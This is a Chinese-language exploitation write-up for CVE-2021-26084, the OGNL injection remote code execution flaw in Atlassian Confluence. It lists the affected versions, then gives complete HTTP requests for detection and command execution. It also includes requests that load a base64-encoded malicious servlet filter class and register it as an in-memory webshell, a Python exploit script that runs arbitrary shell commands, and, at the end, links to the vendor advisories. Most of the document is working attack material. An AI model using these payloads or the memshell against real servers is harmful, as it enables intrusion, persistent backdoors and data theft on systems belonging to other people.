Atlassian Confluence OGNL表达式注入RCE CVE-2021-26084

影响版本

All 4.x.x versions
All 5.x.x versions
All 6.0.x versions
All 6.1.x versions
All 6.2.x versions
All 6.3.x versions
All 6.4.x versions
All 6.5.x versions
All 6.6.x versions
All 6.7.x versions
All 6.8.x versions
All 6.9.x versions
All 6.10.x versions
All 6.11.x versions
All 6.12.x versions
All 6.13.x versions before 6.13.23
All 6.14.x versions
All 6.15.x versions
All 7.0.x versions
All 7.1.x versions
All 7.2.x versions
All 7.3.x versions
All 7.4.x versions before 7.4.11
All 7.5.x versions
All 7.6.x versions
All 7.7.x versions
All 7.8.x versions
All 7.9.x versions
All 7.10.x versions
All 7.11.x versions before 7.11.6
All 7.12.x versions before 7.12.5

环境搭建

Atlassian Confluence 搭建和调试

漏洞复现

参考：https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md

检测

POST /pages/doenterpagevariables.action HTTP/1.1
Host: 0.0.0.0
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: seraph.confluence=10420225%3A99812635f8ead516748600dabcae6fb275114958; JSESSIONID=8476B9EB2D8EF2235053A3CB8A2C0500
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45queryString=aaaa\u0027%2b#{3*333}%2b\u0027bbb

返回包出现999即可证明ognl表达式成功执行。说明漏洞存在。

利用

POST /pages/doenterpagevariables.action HTTP/1.1
Host: 0.0.0.0
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: seraph.confluence=10420225%3A99812635f8ead516748600dabcae6fb275114958; JSESSIONID=8476B9EB2D8EF2235053A3CB8A2C0500
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 310queryString=aaa\u0027%2b#{\u0022\u0022[\u0022class\u0022].forName(\u0022javax.script.ScriptEngineManager\u0022).newInstance().getEngineByName(\u0022js\u0022).eval(\u0022var x=new java.lang.ProcessBuilder;x.command([\u0027/bin/bash\u0027,\u0027-c\u0027,\u0027touch /tmp/hacked\u0027]);x.start()\u0022)}%2b\u0027

注入内存马

POST /pages/doenterpagevariables.action HTTP/1.1
Host: 127.0.0.1:8090
Content-Length: 3326
Cache-Control: max-age=0
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1:8090
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1:8090/pages/doenterpagevariables.action
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=55BF0FB2FF4C8731D707970E03B845CB
Connection: closequeryString=lalalala%5Cu0027%2C%28linkCreation%29%280xd0ff90%29%2C%5Cu0027lalalala&linkCreation=%23a%3D%40java.lang.Thread%40currentThread%28%29.getContextClassLoader%28%29%2C%23classfile%3D%22yv66vgAAADQAZwoAEwA4BwA5CAA6CwACADsHADwHAD0IAD4IAD8KAAUAQAoABQBBCgBCAEMKAEQARQsARgBHCgAGAEgKAEkASgoAQgBLCwBMAE0HAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEADExFdmlsRmlsdGVyOwEABGluaXQBAB8oTGphdmF4L3NlcnZsZXQvRmlsdGVyQ29uZmlnOylWAQAMZmlsdGVyQ29uZmlnAQAcTGphdmF4L3NlcnZsZXQvRmlsdGVyQ29uZmlnOwEACkV4Y2VwdGlvbnMHAFEBAAhkb0ZpbHRlcgEAWyhMamF2YXgvc2VydmxldC9TZXJ2bGV0UmVxdWVzdDtMamF2YXgvc2VydmxldC9TZXJ2bGV0UmVzcG9uc2U7TGphdmF4L3NlcnZsZXQvRmlsdGVyQ2hhaW47KVYBAAVieXRlcwEAAltCAQAHcHJvY2VzcwEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANsZW4BAAFJAQAOc2VydmxldFJlcXVlc3QBAB5MamF2YXgvc2VydmxldC9TZXJ2bGV0UmVxdWVzdDsBAA9zZXJ2bGV0UmVzcG9uc2UBAB9MamF2YXgvc2VydmxldC9TZXJ2bGV0UmVzcG9uc2U7AQALZmlsdGVyQ2hhaW4BABtMamF2YXgvc2VydmxldC9GaWx0ZXJDaGFpbjsBAANyZXEBACdMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVxdWVzdDsBAA1TdGFja01hcFRhYmxlBwA5BwBSAQAHZGVzdHJveQEAClNvdXJjZUZpbGUBAA9FdmlsRmlsdGVyLmphdmEMABUAFgEAJWphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3QBAANjbWQMAFMAVAEAGGphdmEvbGFuZy9Qcm9jZXNzQnVpbGRlcgEAEGphdmEvbGFuZy9TdHJpbmcBAARiYXNoAQACLWMMABUAVQwAVgBXBwBYDABZAFoHAFsMAFwAXQcAXgwAXwBgDAAVAGEHAGIMAGMAZAwANQAWBwBlDAAiAGYBAApFdmlsRmlsdGVyAQAQamF2YS9sYW5nL09iamVjdAEAFGphdmF4L3NlcnZsZXQvRmlsdGVyAQAeamF2YXgvc2VydmxldC9TZXJ2bGV0RXhjZXB0aW9uAQATamF2YS9pby9JT0V4Y2VwdGlvbgEADGdldFBhcmFtZXRlcgEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQAWKFtMamF2YS9sYW5nL1N0cmluZzspVgEABXN0YXJ0AQAVKClMamF2YS9sYW5nL1Byb2Nlc3M7AQARamF2YS9sYW5nL1Byb2Nlc3MBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQATamF2YS9pby9JbnB1dFN0cmVhbQEABHJlYWQBAAUoW0IpSQEAHWphdmF4L3NlcnZsZXQvU2VydmxldFJlc3BvbnNlAQAJZ2V0V3JpdGVyAQAXKClMamF2YS9pby9QcmludFdyaXRlcjsBAAcoW0JJSSlWAQATamF2YS9pby9QcmludFdyaXRlcgEABXdyaXRlAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWAQAZamF2YXgvc2VydmxldC9GaWx0ZXJDaGFpbgEAQChMamF2YXgvc2VydmxldC9TZXJ2bGV0UmVxdWVzdDtMamF2YXgvc2VydmxldC9TZXJ2bGV0UmVzcG9uc2U7KVYAIQASABMAAQAUAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAcAGQAAAAwAAQAAAAUAGgAbAAAAAQAcAB0AAgAXAAAANQAAAAIAAAABsQAAAAIAGAAAAAYAAQAAAAsAGQAAABYAAgAAAAEAGgAbAAAAAAABAB4AHwABACAAAAAEAAEAIQABACIAIwACABcAAAERAAcACAAAAG8rwAACOgQZBBIDuQAEAgDGAFcRBAC8CDoFuwAFWQa9AAZZAxIHU1kEEghTWQUZBBIDuQAEAgBTtwAJtgAKOgYZBrYACxkFtgAMNgcsuQANAQC7AAZZGQUDFQe3AA62AA8ZBrYAELEtKyy5ABEDALEAAAADABgAAAAqAAoAAAAPAAYAEAASABEAGQASAD8AEwBLABQAYAAVAGUAFgBmABgAbgAZABkAAABSAAgAGQBNACQAJQAFAD8AJwAmACcABgBLABsAKAApAAcAAABvABoAGwAAAAAAbwAqACsAAQAAAG8ALAAtAAIAAABvAC4ALwADAAYAaQAwADEABAAyAAAACAAB%2FABmBwAzACAAAAAGAAIANAAhAAEANQAWAAEAFwAAACsAAAABAAAAAbEAAAACABgAAAAGAAEAAAAeABkAAAAMAAEAAAABABoAGwAAAAEANgAAAAIANw%3D%3D%22%2C%23ClassLoaderClass%3D%40java.lang.Class%40forName%28%22java.lang.ClassLoader%22%29%2C%23defineClassMethod%3D%23ClassLoaderClass.getDeclaredMethods%28%29%5B21%5D%2C%23defineClassMethod.setAccessible%28true%29%2C%23classbytes+%3D+%40java.util.Base64%40getDecoder%28%29.decode%28%23classfile%29%2C%23b%3Dnew+java.lang.Object%5B%5D%7B%23classbytes%2C+new+java.lang.Integer%280%29%2C+new+java.lang.Integer%28%23classbytes.length%29%7D%2C%23defineClassMethod.invoke%28%23a%2C+%23b%29%2C%40java.lang.System%40out.println%28%22Success%22%29

POST /pages/doenterpagevariables.action HTTP/1.1
Host: 127.0.0.1:8090
Content-Length: 1934
Cache-Control: max-age=0
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1:8090
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1:8090/pages/doenterpagevariables.action
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=55BF0FB2FF4C8731D707970E03B845CB
Connection: closequeryString=lalalala%5Cu0027%2C%28linkCreation%29%280xd0ff90%29%2C%5Cu0027lalalala&linkCreation=%23a%3D%40java.lang.Thread%40currentThread%28%29.getContextClassLoader%28%29%2C%23filter%3D%23a.loadClass%28%22EvilFilter%22%29.newInstance%28%29%2C%23name%3Dnew+java.lang.String%28%22memshell%22%29%2C%23context1%3D%23a.getResources%28%29.getContext%28%29%2C%23appctx%3D%23context1.getClass%28%29.getDeclaredField%28%22context%22%29%2C%23appctx.setAccessible%28true%29%2C%23applicationContext%3D%23appctx.get%28%23context1%29%2C%23stdctx%3D%23applicationContext.getClass%28%29.getDeclaredField%28%22context%22%29%2C%23stdctx.setAccessible%28true%29%2C%23standardContext%3D%23stdctx.get%28%23applicationContext%29%2C%23Configs%3D%23standardContext.getClass%28%29.getDeclaredField%28%22filterConfigs%22%29%2C%23Configs.setAccessible%28true%29%2C%23filterConfigs%3D%23Configs.get%28%23standardContext%29%2C%23filterDef%3Dnew+org.apache.tomcat.util.descriptor.web.FilterDef%28%29%2C%23filterDef.setFilter%28%23filter%29%2C%23filterDef.setFilterName%28%23name%29%2C%23filterDef.setFilterClass%28%23filter.getClass%28%29.getName%28%29%29%2C%23standardContext.addFilterDef%28%23filterDef%29%2C%23filterMap%3Dnew+org.apache.tomcat.util.descriptor.web.FilterMap%28%29%2C%23filterMap.addURLPattern%28%27%2F*%27%29%2C%23filterMap.setFilterName%28%23name%29%2C%23filterMap.setDispatcher%28%40javax.servlet.DispatcherType%40REQUEST.name%28%29%29%2C%23standardContext.addFilterMapBefore%28%23filterMap%29%2C%23constructor1%3D%40java.lang.Class%40forName%28%22org.apache.catalina.core.ApplicationFilterConfig%22%29.getDeclaredConstructors%28%29%5B0%5D%2C%23constructor1.setAccessible%28true%29%2C%23parameters%3Dnew+java.lang.Object%5B%5D%7B%23standardContext%2C%23filterDef%7D%2C%23filterConfig%3D%23constructor1.newInstance%28%23parameters%29%2C%23filterConfigs.put%28%23name%2C%23filterConfig%29%2C%40java.lang.System%40out.println%28%22Success%22%29

加载恶意filter类

queryString=lalalala\u0027,(linkCreation)(0xd0ff90),\u0027lalalala&linkCreation=
#a=@java.lang.Thread@currentThread().getContextClassLoader(),
#classfile="恶意filter class文件base64",
#ClassLoaderClass=@java.lang.Class@forName("java.lang.ClassLoader"),
#defineClassMethod=#ClassLoaderClass.getDeclaredMethods()[21],
#defineClassMethod.setAccessible(true),
#classbytes = @java.util.Base64@getDecoder().decode(#classfile),
#b=new java.lang.Object[]{#classbytes, new java.lang.Integer(0), new java.lang.Integer(#classbytes.length)},
#defineClassMethod.invoke(#a, #b),
@java.lang.System@out.println("Success")

注册Filter

queryString=lalalala\u0027,(linkCreation)(0xd0ff90),\u0027lalalala&linkCreation=
#a=@java.lang.Thread@currentThread().getContextClassLoader(),
#filter=#a.loadClass("恶意Filter名称").newInstance(),
#name=new java.lang.String("memshell"),
#context1=#a.getResources().getContext(),
#appctx=#context1.getClass().getDeclaredField("context"),
#appctx.setAccessible(true),#applicationContext=#appctx.get(#context1),
#stdctx=#applicationContext.getClass().getDeclaredField("context"),
#stdctx.setAccessible(true),
#standardContext=#stdctx.get(#applicationContext),
#Configs=#standardContext.getClass().getDeclaredField("filterConfigs"),
#Configs.setAccessible(true),
#filterConfigs=#Configs.get(#standardContext),
#filterDef=new org.apache.tomcat.util.descriptor.web.FilterDef(),
#filterDef.setFilter(#filter),
#filterDef.setFilterName(#name),
#filterDef.setFilterClass(#filter.getClass().getName()),
#standardContext.addFilterDef(#filterDef),
#filterMap=new org.apache.tomcat.util.descriptor.web.FilterMap(),
#filterMap.addURLPattern('/*'),
#filterMap.setFilterName(#name),
#filterMap.setDispatcher(@javax.servlet.DispatcherType@REQUEST.name()),
#standardContext.addFilterMapBefore(#filterMap),
#constructor1=@java.lang.Class@forName("org.apache.catalina.core.ApplicationFilterConfig").getDeclaredConstructors()[0],
#constructor1.setAccessible(true),
#parameters=new java.lang.Object[]{#standardContext,#filterDef},
#filterConfig=#constructor1.newInstance(#parameters),
#filterConfigs.put(#name,#filterConfig),
@java.lang.System@out.println("Success")

exp

import requests
import re
import sysdef login(sess):data = {"os_username": "admin","os_password": "admin","login": "登录"}sess.post("http://127.0.0.1:8090/dologin.action", data=data, headers={"Content-Type": "application/x-www-form-urlencoded"})return sessdef exp1():sess = requests.Session()sess = login(sess)data = {"featureKey": payload}res = sess.post("http://127.0.0.1:8090/users/darkfeatures.action", data=data, headers={"Content-Type": "application/x-www-form-urlencoded"})result = re.findall('value="{(.*)=null}', re.findall('<input type="text" name="featureKey" id="featureKey"(.*)class="text', res.text)[0].strip())[0].replace("$$", "\n")return resultdef exp2():sess = requests.Session()url = "http://127.0.0.1:8090/pages/doenterpagevariables.action"data = {"queryString": payload}res = sess.post(url, data=data, proxies={"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"})result = re.findall('value="{(.*)=null}', re.findall('name="queryString"(.*)/>', res.text)[0].strip())[0].replace("$$", "\n")return resultdef isWin():return Truedef main():res = exp2()print(res)if __name__ == '__main__':cmd = "ls -al"cmd = sys.argv[1]payload = """\\u0027+#{\\u0022\\u0022[\\u0022class\\u0022].forName(\\u0022javax.script.ScriptEngineManager\\u0022).newInstance().getEngineByName(\\u0022js\\u0022).eval(\\u0022var a=new java.lang.ProcessBuilder(\\u0027/bin/bash\\u0027,\\u0027-c\\u0027,\\u0027"""+cmd+"""\\u0027);var b=new java.io.InputStreamReader(a.start().getInputStream(),\\u0027gbk\\u0027);var c=new java.io.BufferedReader(b);var sb = new java.lang.StringBuffer();while((line=c.readLine())!=null){sb.append(line+\\u0027$$\\u0027);}sb.toString();\\u0022)}+\\u0027"""main()

参考资料

漏洞通告

【漏洞通告】Atlassian Confluence 远程代码执行漏洞（CVE-2021-26084） (qq.com)
Confluence Security Advisory - 2021-08-25 | Confluence Data Center and Server 7.13 | Atlassian Documentation
[CONFSERVER-67940] Confluence Server Webwork OGNL injection - CVE-2021-26084 - Create and track feature requests for Atlassian products.
[JRASERVER-70944] Make use of Secure Introspector in Velocity Templates - CVE-2019-20409 - Create and track feature requests for Atlassian products.